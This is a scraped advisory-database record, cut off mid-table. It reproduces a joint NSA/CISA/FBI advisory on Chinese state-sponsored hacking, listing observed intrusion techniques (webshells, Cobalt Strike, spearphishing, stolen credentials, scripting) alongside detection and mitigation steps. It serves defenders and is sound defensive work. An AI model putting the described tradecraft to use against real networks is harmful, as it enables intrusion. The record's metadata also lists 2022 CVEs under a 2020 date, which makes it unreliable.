Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:08:20", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&amp;CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&amp;CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&amp;CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis 